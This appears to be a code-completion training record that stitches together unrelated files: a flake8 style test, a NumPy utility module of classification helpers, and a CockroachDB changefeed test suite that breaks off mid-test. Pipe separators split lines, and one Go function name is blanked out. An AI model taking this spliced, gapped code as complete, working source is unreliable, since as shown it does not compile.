# implicitly calls report_errors()
report = style_guide.check_files([
str(Path(__file__).parents[1] / 'colcon_powershell'),
])
report_tests = style_guide_tests.check_files([
str(Path(__file__).parents[1] / 'test'),
])
sys.stdout = stdout
total_errors = report.total_errors + report_tests.total_errors
if total_errors: # pragma: no cover
# output summary with per-category counts
print()
report._application.formatter.show_statistics(report._stats)
print(
'flake8 reported {total_errors} errors'
.format_map(locals()), file=sys.stderr)
assert not report.total_errors, \
'flake8 reported {total_errors} errors'.format_map(locals()) |
|
np_utils.py | from __future__ import absolute_import
import numpy as np
import scipy as sp
from six.moves import range
from six.moves import zip
def to_categorical(y, nb_classes=None):
'''Convert class vector (integers from 0 to nb_classes)
to binary class matrix, for use with categorical_crossentropy.
'''
if not nb_classes:
nb_classes = np.max(y)+1
Y = np.zeros((len(y), nb_classes))
for i in range(len(y)):
Y[i, y[i]] = 1.
return Y
def normalize(a, axis=-1, order=2):
l2 = np.atleast_1d(np.linalg.norm(a, order, axis))
l2[l2 == 0] = 1
return a / np.expand_dims(l2, axis)
def binary_logloss(p, y):
epsilon = 1e-15
p = sp.maximum(epsilon, p)
p = sp.minimum(1-epsilon, p)
res = sum(y * sp.log(p) + sp.subtract(1, y) * sp.log(sp.subtract(1, p)))
res *= -1.0/len(y)
return res
def multiclass_logloss(P, Y):
npreds = [P[i][Y[i]-1] for i in range(len(Y))]
score = -(1. / len(Y)) * np.sum(np.log(npreds))
return score
def accuracy(p, y):
return np.mean([a == b for a, b in zip(p, y)])
def probas_to_classes(y_pred):
if len(y_pred.shape) > 1 and y_pred.shape[1] > 1:
return categorical_probas_to_classes(y_pred)
return np.array([1 if p > 0.5 else 0 for p in y_pred])
def categorical_probas_to_classes(p):
return np.argmax(p, axis=1)
def convert_kernel(kernel, dim_ordering='th'):
'''Converts a kernel matrix (numpy array)
from Theano format to TensorFlow format
(or reciprocally, since the transformation
is its own inverse).
'''
new_kernel = np.copy(kernel)
if dim_ordering == 'th':
w = kernel.shape[2]
h = kernel.shape[3]
for i in range(w):
for j in range(h):
new_kernel[:, :, i, j] = kernel[:, :, w - i - 1, h - j - 1]
elif dim_ordering == 'tf':
w = kernel.shape[0]
h = kernel.shape[1]
for i in range(w):
for j in range(h):
new_kernel[i, j, :, :] = kernel[w - i - 1, h - j - 1, :, :]
else:
raise Exception('Invalid dim_ordering: ' + str(dim_ordering)) | return new_kernel |
|
changefeed_test.go | // Copyright 2018 The Cockroach Authors.
//
// Licensed as a CockroachDB Enterprise file under the Cockroach Community
// License (the "License"); you may not use this file except in compliance with
// the License. You may obtain a copy of the License at
//
// https://github.com/cockroachdb/cockroach/blob/master/licenses/CCL.txt
package changefeedccl
import (
"context"
gosql "database/sql"
"fmt"
"math"
"net/url"
"regexp"
"sort"
"strconv"
"strings"
"sync"
"sync/atomic"
"testing"
"time"
"github.com/cockroachdb/cockroach-go/crdb"
"github.com/cockroachdb/cockroach/pkg/base"
"github.com/cockroachdb/cockroach/pkg/ccl/changefeedccl/cdctest"
"github.com/cockroachdb/cockroach/pkg/ccl/changefeedccl/changefeedbase"
"github.com/cockroachdb/cockroach/pkg/ccl/utilccl"
"github.com/cockroachdb/cockroach/pkg/jobs"
"github.com/cockroachdb/cockroach/pkg/jobs/jobspb"
"github.com/cockroachdb/cockroach/pkg/keys"
"github.com/cockroachdb/cockroach/pkg/kv"
"github.com/cockroachdb/cockroach/pkg/roachpb"
"github.com/cockroachdb/cockroach/pkg/security"
"github.com/cockroachdb/cockroach/pkg/server"
"github.com/cockroachdb/cockroach/pkg/server/telemetry"
"github.com/cockroachdb/cockroach/pkg/sql/execinfra"
"github.com/cockroachdb/cockroach/pkg/sql/sqlbase"
"github.com/cockroachdb/cockroach/pkg/storage"
"github.com/cockroachdb/cockroach/pkg/testutils"
"github.com/cockroachdb/cockroach/pkg/testutils/serverutils"
"github.com/cockroachdb/cockroach/pkg/testutils/sqlutils"
"github.com/cockroachdb/cockroach/pkg/util"
"github.com/cockroachdb/cockroach/pkg/util/encoding"
"github.com/cockroachdb/cockroach/pkg/util/hlc"
"github.com/cockroachdb/cockroach/pkg/util/leaktest"
"github.com/cockroachdb/cockroach/pkg/util/log"
"github.com/cockroachdb/cockroach/pkg/util/protoutil"
"github.com/cockroachdb/cockroach/pkg/util/retry"
"github.com/cockroachdb/cockroach/pkg/util/timeutil"
"github.com/pkg/errors"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func TestChangefeedBasics(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'initial')`)
sqlDB.Exec(t, `UPSERT INTO foo VALUES (0, 'updated')`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
// 'initial' is skipped because only the latest value ('updated') is
// emitted by the initial scan.
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "updated"}}`,
})
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a'), (2, 'b')`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1, "b": "a"}}`,
`foo: [2]->{"after": {"a": 2, "b": "b"}}`,
})
sqlDB.Exec(t, `UPSERT INTO foo VALUES (2, 'c'), (3, 'd')`)
assertPayloads(t, foo, []string{
`foo: [2]->{"after": {"a": 2, "b": "c"}}`,
`foo: [3]->{"after": {"a": 3, "b": "d"}}`,
})
sqlDB.Exec(t, `DELETE FROM foo WHERE a = 1`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": null}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
t.Run(`cloudstorage`, cloudStorageTest(testFn))
// NB running TestChangefeedBasics, which includes a DELETE, with
// cloudStorageTest is a regression test for #36994.
}
func TestChangefeedDiff(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'initial')`)
sqlDB.Exec(t, `UPSERT INTO foo VALUES (0, 'updated')`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH diff`)
defer closeFeed(t, foo)
// 'initial' is skipped because only the latest value ('updated') is
// emitted by the initial scan.
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "updated"}, "before": null}`,
})
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a'), (2, 'b')`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1, "b": "a"}, "before": null}`,
`foo: [2]->{"after": {"a": 2, "b": "b"}, "before": null}`,
})
sqlDB.Exec(t, `UPSERT INTO foo VALUES (2, 'c'), (3, 'd')`)
assertPayloads(t, foo, []string{
`foo: [2]->{"after": {"a": 2, "b": "c"}, "before": {"a": 2, "b": "b"}}`,
`foo: [3]->{"after": {"a": 3, "b": "d"}, "before": null}`,
})
sqlDB.Exec(t, `DELETE FROM foo WHERE a = 1`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": null, "before": {"a": 1, "b": "a"}}`,
})
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'new a')`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1, "b": "new a"}, "before": null}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
t.Run(`cloudstorage`, cloudStorageTest(testFn))
}
func TestChangefeedEnvelope(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a')`)
t.Run(`envelope=row`, func(t *testing.T) {
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH envelope='row'`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{`foo: [1]->{"a": 1, "b": "a"}`})
})
t.Run(`envelope=deprecated_row`, func(t *testing.T) {
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH envelope='deprecated_row'`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{`foo: [1]->{"a": 1, "b": "a"}`})
})
t.Run(`envelope=key_only`, func(t *testing.T) {
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH envelope='key_only'`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{`foo: [1]->`})
})
t.Run(`envelope=wrapped`, func(t *testing.T) {
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH envelope='wrapped'`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{`foo: [1]->{"after": {"a": 1, "b": "a"}}`})
})
t.Run(`envelope=wrapped,key_in_value`, func(t *testing.T) {
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH key_in_value, envelope='wrapped'`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{`foo: [1]->{"after": {"a": 1, "b": "a"}, "key": [1]}`})
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedMultiTable(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a')`)
sqlDB.Exec(t, `CREATE TABLE bar (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO bar VALUES (2, 'b')`)
fooAndBar := feed(t, f, `CREATE CHANGEFEED FOR foo, bar`)
defer closeFeed(t, fooAndBar)
assertPayloads(t, fooAndBar, []string{
`foo: [1]->{"after": {"a": 1, "b": "a"}}`,
`bar: [2]->{"after": {"a": 2, "b": "b"}}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedCursor(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
// To make sure that these timestamps are after 'before' and before
// 'after', throw a couple sleeps around them. We round timestamps to
// Microsecond granularity for Postgres compatibility, so make the
// sleeps 10x that.
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'before')`)
time.Sleep(10 * time.Microsecond)
var tsLogical string
sqlDB.QueryRow(t, `SELECT cluster_logical_timestamp()`).Scan(&tsLogical)
var tsClock time.Time
sqlDB.QueryRow(t, `SELECT clock_timestamp()`).Scan(&tsClock)
time.Sleep(10 * time.Microsecond)
sqlDB.Exec(t, `INSERT INTO foo VALUES (2, 'after')`)
fooLogical := feed(t, f, `CREATE CHANGEFEED FOR foo WITH cursor=$1`, tsLogical)
defer closeFeed(t, fooLogical)
assertPayloads(t, fooLogical, []string{
`foo: [2]->{"after": {"a": 2, "b": "after"}}`,
})
nanosStr := strconv.FormatInt(tsClock.UnixNano(), 10)
fooNanosStr := feed(t, f, `CREATE CHANGEFEED FOR foo WITH cursor=$1`, nanosStr)
defer closeFeed(t, fooNanosStr)
assertPayloads(t, fooNanosStr, []string{
`foo: [2]->{"after": {"a": 2, "b": "after"}}`,
})
timeStr := tsClock.Format(`2006-01-02 15:04:05.999999`)
fooString := feed(t, f, `CREATE CHANGEFEED FOR foo WITH cursor=$1`, timeStr)
defer closeFeed(t, fooString)
assertPayloads(t, fooString, []string{
`foo: [2]->{"after": {"a": 2, "b": "after"}}`,
})
// Check that the cursor is properly hooked up to the job statement
// time. The sinkless tests currently don't have a way to get the
// statement timestamp, so only verify this for enterprise.
if e, ok := fooLogical.(*cdctest.TableFeed); ok {
var bytes []byte
sqlDB.QueryRow(t, `SELECT payload FROM system.jobs WHERE id=$1`, e.JobID).Scan(&bytes)
var payload jobspb.Payload
require.NoError(t, protoutil.Unmarshal(bytes, &payload))
require.Equal(t, parseTimeToHLC(t, tsLogical), payload.GetChangefeed().StatementTime)
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedTimestamps(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
ctx := context.Background()
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0)`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH updated, resolved`)
defer closeFeed(t, foo)
// Grab the first non resolved-timestamp row.
var row0 *cdctest.TestFeedMessage
for {
var err error
row0, err = foo.Next()
assert.NoError(t, err)
if len(row0.Value) > 0 {
break
}
}
// If this changefeed uses jobs (and thus stores a ChangefeedDetails), get
// the statement timestamp from row0 and verify that they match. Otherwise,
// just skip the row.
if !strings.Contains(t.Name(), `sinkless`) {
d, err := foo.(*cdctest.TableFeed).Details()
assert.NoError(t, err)
expected := `{"after": {"a": 0}, "updated": "` + d.StatementTime.AsOfSystemTime() + `"}`
assert.Equal(t, expected, string(row0.Value))
}
// Assert the remaining key using assertPayloads, since we know the exact
// timestamp expected.
var ts1 string
if err := crdb.ExecuteTx(ctx, db, nil /* txopts */, func(tx *gosql.Tx) error {
return tx.QueryRow(
`INSERT INTO foo VALUES (1) RETURNING cluster_logical_timestamp()`,
).Scan(&ts1)
}); err != nil {
t.Fatal(err)
}
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1}, "updated": "` + ts1 + `"}`,
})
// Check that we eventually get a resolved timestamp greater than ts1.
parsed := parseTimeToHLC(t, ts1)
for {
if resolved := expectResolvedTimestamp(t, foo); parsed.Less(resolved) {
break
}
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func | (t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
const freq = 10 * time.Millisecond
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH resolved=$1`, freq.String())
defer closeFeed(t, foo)
// We get each resolved timestamp notification once in each partition.
// Grab the first `2 * #partitions`, sort because we might get all from
// one partition first, and compare the first and last.
resolved := make([]hlc.Timestamp, 2*len(foo.Partitions()))
for i := range resolved {
resolved[i] = expectResolvedTimestamp(t, foo)
}
sort.Slice(resolved, func(i, j int) bool { return resolved[i].Less(resolved[j]) })
first, last := resolved[0], resolved[len(resolved)-1]
if d := last.GoTime().Sub(first.GoTime()); d < freq {
t.Errorf(`expected %s between resolved timestamps, but got %s`, freq, d)
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
// Test how Changefeeds react to schema changes that do not require a backfill
// operation.
func TestChangefeedInitialScan(t *testing.T) {
defer leaktest.AfterTest(t)()
scope := log.Scope(t)
defer scope.Close(t)
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `SET CLUSTER SETTING kv.closed_timestamp.target_duration = '10ms'`)
t.Run(`no cursor - no initial scan`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE no_initial_scan (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO no_initial_scan VALUES (1)`)
noInitialScan := feed(t, f, `CREATE CHANGEFEED FOR no_initial_scan `+
`WITH no_initial_scan, resolved='10ms'`)
defer closeFeed(t, noInitialScan)
expectResolvedTimestamp(t, noInitialScan)
sqlDB.Exec(t, `INSERT INTO no_initial_scan VALUES (2)`)
assertPayloads(t, noInitialScan, []string{
`no_initial_scan: [2]->{"after": {"a": 2}}`,
})
})
t.Run(`cursor - with initial scan`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE initial_scan (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO initial_scan VALUES (1), (2), (3)`)
var tsStr string
var i int
sqlDB.QueryRow(t, `SELECT count(*), cluster_logical_timestamp() from initial_scan`).Scan(&i, &tsStr)
initialScan := feed(t, f, `CREATE CHANGEFEED FOR initial_scan `+
`WITH initial_scan, resolved='10ms', cursor='`+tsStr+`'`)
defer closeFeed(t, initialScan)
assertPayloads(t, initialScan, []string{
`initial_scan: [1]->{"after": {"a": 1}}`,
`initial_scan: [2]->{"after": {"a": 2}}`,
`initial_scan: [3]->{"after": {"a": 3}}`,
})
sqlDB.Exec(t, `INSERT INTO initial_scan VALUES (4)`)
assertPayloads(t, initialScan, []string{
`initial_scan: [4]->{"after": {"a": 4}}`,
})
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
// Test how Changefeeds react to schema changes that do not require a backfill
// operation.
func TestChangefeedSchemaChangeNoBackfill(t *testing.T) {
defer leaktest.AfterTest(t)()
scope := log.Scope(t)
defer scope.Close(t)
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// Schema changes that predate the changefeed.
t.Run(`historical`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE historical (a INT PRIMARY KEY, b STRING DEFAULT 'before')`)
var start string
sqlDB.QueryRow(t, `SELECT cluster_logical_timestamp()`).Scan(&start)
sqlDB.Exec(t, `INSERT INTO historical (a, b) VALUES (0, '0')`)
sqlDB.Exec(t, `INSERT INTO historical (a) VALUES (1)`)
sqlDB.Exec(t, `ALTER TABLE historical ALTER COLUMN b SET DEFAULT 'after'`)
sqlDB.Exec(t, `INSERT INTO historical (a) VALUES (2)`)
sqlDB.Exec(t, `ALTER TABLE historical ADD COLUMN c INT`)
sqlDB.Exec(t, `INSERT INTO historical (a) VALUES (3)`)
sqlDB.Exec(t, `INSERT INTO historical (a, c) VALUES (4, 14)`)
historical := feed(t, f, `CREATE CHANGEFEED FOR historical WITH cursor=$1`, start)
defer closeFeed(t, historical)
assertPayloads(t, historical, []string{
`historical: [0]->{"after": {"a": 0, "b": "0"}}`,
`historical: [1]->{"after": {"a": 1, "b": "before"}}`,
`historical: [2]->{"after": {"a": 2, "b": "after"}}`,
`historical: [3]->{"after": {"a": 3, "b": "after", "c": null}}`,
`historical: [4]->{"after": {"a": 4, "b": "after", "c": 14}}`,
})
})
t.Run(`add column`, func(t *testing.T) {
// NB: the default is a nullable column
sqlDB.Exec(t, `CREATE TABLE add_column (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO add_column VALUES (1)`)
addColumn := feed(t, f, `CREATE CHANGEFEED FOR add_column`)
defer closeFeed(t, addColumn)
assertPayloads(t, addColumn, []string{
`add_column: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column ADD COLUMN b STRING`)
sqlDB.Exec(t, `INSERT INTO add_column VALUES (2, '2')`)
assertPayloads(t, addColumn, []string{
`add_column: [2]->{"after": {"a": 2, "b": "2"}}`,
})
})
t.Run(`rename column`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE rename_column (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO rename_column VALUES (1, '1')`)
renameColumn := feed(t, f, `CREATE CHANGEFEED FOR rename_column`)
defer closeFeed(t, renameColumn)
assertPayloads(t, renameColumn, []string{
`rename_column: [1]->{"after": {"a": 1, "b": "1"}}`,
})
sqlDB.Exec(t, `ALTER TABLE rename_column RENAME COLUMN b TO c`)
sqlDB.Exec(t, `INSERT INTO rename_column VALUES (2, '2')`)
assertPayloads(t, renameColumn, []string{
`rename_column: [2]->{"after": {"a": 2, "c": "2"}}`,
})
})
t.Run(`add default`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_default (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO add_default (a, b) VALUES (1, '1')`)
addDefault := feed(t, f, `CREATE CHANGEFEED FOR add_default`)
defer closeFeed(t, addDefault)
sqlDB.Exec(t, `ALTER TABLE add_default ALTER COLUMN b SET DEFAULT 'd'`)
sqlDB.Exec(t, `INSERT INTO add_default (a) VALUES (2)`)
assertPayloads(t, addDefault, []string{
`add_default: [1]->{"after": {"a": 1, "b": "1"}}`,
`add_default: [2]->{"after": {"a": 2, "b": "d"}}`,
})
})
t.Run(`drop default`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE drop_default (a INT PRIMARY KEY, b STRING DEFAULT 'd')`)
sqlDB.Exec(t, `INSERT INTO drop_default (a) VALUES (1)`)
dropDefault := feed(t, f, `CREATE CHANGEFEED FOR drop_default`)
defer closeFeed(t, dropDefault)
sqlDB.Exec(t, `ALTER TABLE drop_default ALTER COLUMN b DROP DEFAULT`)
sqlDB.Exec(t, `INSERT INTO drop_default (a) VALUES (2)`)
assertPayloads(t, dropDefault, []string{
`drop_default: [1]->{"after": {"a": 1, "b": "d"}}`,
`drop_default: [2]->{"after": {"a": 2, "b": null}}`,
})
})
t.Run(`drop not null`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE drop_notnull (a INT PRIMARY KEY, b STRING NOT NULL)`)
sqlDB.Exec(t, `INSERT INTO drop_notnull VALUES (1, '1')`)
dropNotNull := feed(t, f, `CREATE CHANGEFEED FOR drop_notnull`)
defer closeFeed(t, dropNotNull)
sqlDB.Exec(t, `ALTER TABLE drop_notnull ALTER b DROP NOT NULL`)
sqlDB.Exec(t, `INSERT INTO drop_notnull VALUES (2, NULL)`)
assertPayloads(t, dropNotNull, []string{
`drop_notnull: [1]->{"after": {"a": 1, "b": "1"}}`,
`drop_notnull: [2]->{"after": {"a": 2, "b": null}}`,
})
})
t.Run(`checks`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE checks (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO checks VALUES (1)`)
checks := feed(t, f, `CREATE CHANGEFEED FOR checks`)
defer closeFeed(t, checks)
sqlDB.Exec(t, `ALTER TABLE checks ADD CONSTRAINT c CHECK (a < 5) NOT VALID`)
sqlDB.Exec(t, `INSERT INTO checks VALUES (2)`)
sqlDB.Exec(t, `ALTER TABLE checks VALIDATE CONSTRAINT c`)
sqlDB.Exec(t, `INSERT INTO checks VALUES (3)`)
sqlDB.Exec(t, `ALTER TABLE checks DROP CONSTRAINT c`)
sqlDB.Exec(t, `INSERT INTO checks VALUES (6)`)
assertPayloads(t, checks, []string{
`checks: [1]->{"after": {"a": 1}}`,
`checks: [2]->{"after": {"a": 2}}`,
`checks: [3]->{"after": {"a": 3}}`,
`checks: [6]->{"after": {"a": 6}}`,
})
})
t.Run(`add index`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_index (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (1, '1')`)
addIndex := feed(t, f, `CREATE CHANGEFEED FOR add_index`)
defer closeFeed(t, addIndex)
sqlDB.Exec(t, `CREATE INDEX b_idx ON add_index (b)`)
sqlDB.Exec(t, `SELECT * FROM add_index@b_idx`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (2, '2')`)
assertPayloads(t, addIndex, []string{
`add_index: [1]->{"after": {"a": 1, "b": "1"}}`,
`add_index: [2]->{"after": {"a": 2, "b": "2"}}`,
})
})
t.Run(`unique`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE "unique" (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO "unique" VALUES (1, '1')`)
unique := feed(t, f, `CREATE CHANGEFEED FOR "unique"`)
defer closeFeed(t, unique)
sqlDB.Exec(t, `ALTER TABLE "unique" ADD CONSTRAINT u UNIQUE (b)`)
sqlDB.Exec(t, `INSERT INTO "unique" VALUES (2, '2')`)
assertPayloads(t, unique, []string{
`unique: [1]->{"after": {"a": 1, "b": "1"}}`,
`unique: [2]->{"after": {"a": 2, "b": "2"}}`,
})
})
t.Run(`alter default`, func(t *testing.T) {
sqlDB.Exec(
t, `CREATE TABLE alter_default (a INT PRIMARY KEY, b STRING DEFAULT 'before')`)
sqlDB.Exec(t, `INSERT INTO alter_default (a) VALUES (1)`)
alterDefault := feed(t, f, `CREATE CHANGEFEED FOR alter_default`)
defer closeFeed(t, alterDefault)
sqlDB.Exec(t, `ALTER TABLE alter_default ALTER COLUMN b SET DEFAULT 'after'`)
sqlDB.Exec(t, `INSERT INTO alter_default (a) VALUES (2)`)
assertPayloads(t, alterDefault, []string{
`alter_default: [1]->{"after": {"a": 1, "b": "before"}}`,
`alter_default: [2]->{"after": {"a": 2, "b": "after"}}`,
})
})
// Test adding a column with explicitly setting the default value to be NULL
t.Run(`add column with DEFAULT NULL`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE t (id INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO t VALUES (1)`)
defaultNull := feed(t, f, `CREATE CHANGEFEED FOR t`)
defer closeFeed(t, defaultNull)
sqlDB.Exec(t, `ALTER TABLE t ADD COLUMN c INT DEFAULT NULL`)
sqlDB.Exec(t, `INSERT INTO t VALUES (2, 2)`)
assertPayloads(t, defaultNull, []string{
// Verify that no column backfill occurs
`t: [1]->{"after": {"id": 1}}`,
`t: [2]->{"after": {"c": 2, "id": 2}}`,
})
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
log.Flush()
entries, err := log.FetchEntriesFromFiles(0, math.MaxInt64, 1, regexp.MustCompile("cdc ux violation"))
if err != nil {
t.Fatal(err)
}
if len(entries) > 0 {
t.Fatalf("Found violation of CDC's guarantees: %v", entries)
}
}
// Test schema changes that require a backfill when the backfill option is
// allowed.
func TestChangefeedSchemaChangeAllowBackfill(t *testing.T) {
defer leaktest.AfterTest(t)()
scope := log.Scope(t)
defer scope.Close(t)
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// Expected semantics:
//
// 1) DROP COLUMN
// If the table descriptor is at version 1 when the `ALTER TABLE` stmt is issued,
// we expect the changefeed level backfill to be triggered at the `ModificationTime` of
// version 2 of the said descriptor. This is because this is the descriptor
// version at which the dropped column stops being visible to SELECTs. Note that
// this means we will see row updates resulting from the schema-change level
// backfill _after_ the changefeed level backfill.
//
// 2) ADD COLUMN WITH DEFAULT & ADD COLUMN AS ... STORED
// If the table descriptor is at version 1 when the `ALTER TABLE` stmt is issued,
// we expect the changefeed level backfill to be triggered at the
// `ModificationTime` of version 4 of said descriptor. This is because this is the
// descriptor version which makes the schema-change level backfill for the
// newly-added column public. This means we wil see row updates resulting from the
// schema-change level backfill _before_ the changefeed level backfill.
t.Run(`add column with default`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_column_def (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO add_column_def VALUES (1)`)
sqlDB.Exec(t, `INSERT INTO add_column_def VALUES (2)`)
addColumnDef := feed(t, f, `CREATE CHANGEFEED FOR add_column_def WITH updated`)
defer closeFeed(t, addColumnDef)
assertPayloadsStripTs(t, addColumnDef, []string{
`add_column_def: [1]->{"after": {"a": 1}}`,
`add_column_def: [2]->{"after": {"a": 2}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column_def ADD COLUMN b STRING DEFAULT 'd'`)
ts := fetchDescVersionModificationTime(t, db, f, `add_column_def`, 4)
// Schema change backfill
assertPayloadsStripTs(t, addColumnDef, []string{
`add_column_def: [1]->{"after": {"a": 1}}`,
`add_column_def: [2]->{"after": {"a": 2}}`,
})
// Changefeed level backfill
assertPayloads(t, addColumnDef, []string{
fmt.Sprintf(`add_column_def: [1]->{"after": {"a": 1, "b": "d"}, "updated": "%s"}`,
ts.AsOfSystemTime()),
fmt.Sprintf(`add_column_def: [2]->{"after": {"a": 2, "b": "d"}, "updated": "%s"}`,
ts.AsOfSystemTime()),
})
})
t.Run(`add column computed`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_col_comp (a INT PRIMARY KEY, b INT AS (a + 5) STORED)`)
sqlDB.Exec(t, `INSERT INTO add_col_comp VALUES (1)`)
sqlDB.Exec(t, `INSERT INTO add_col_comp (a) VALUES (2)`)
addColComp := feed(t, f, `CREATE CHANGEFEED FOR add_col_comp WITH updated`)
defer closeFeed(t, addColComp)
assertPayloadsStripTs(t, addColComp, []string{
`add_col_comp: [1]->{"after": {"a": 1, "b": 6}}`,
`add_col_comp: [2]->{"after": {"a": 2, "b": 7}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_col_comp ADD COLUMN c INT AS (a + 10) STORED`)
assertPayloadsStripTs(t, addColComp, []string{
`add_col_comp: [1]->{"after": {"a": 1, "b": 6}}`,
`add_col_comp: [2]->{"after": {"a": 2, "b": 7}}`,
})
ts := fetchDescVersionModificationTime(t, db, f, `add_col_comp`, 4)
assertPayloads(t, addColComp, []string{
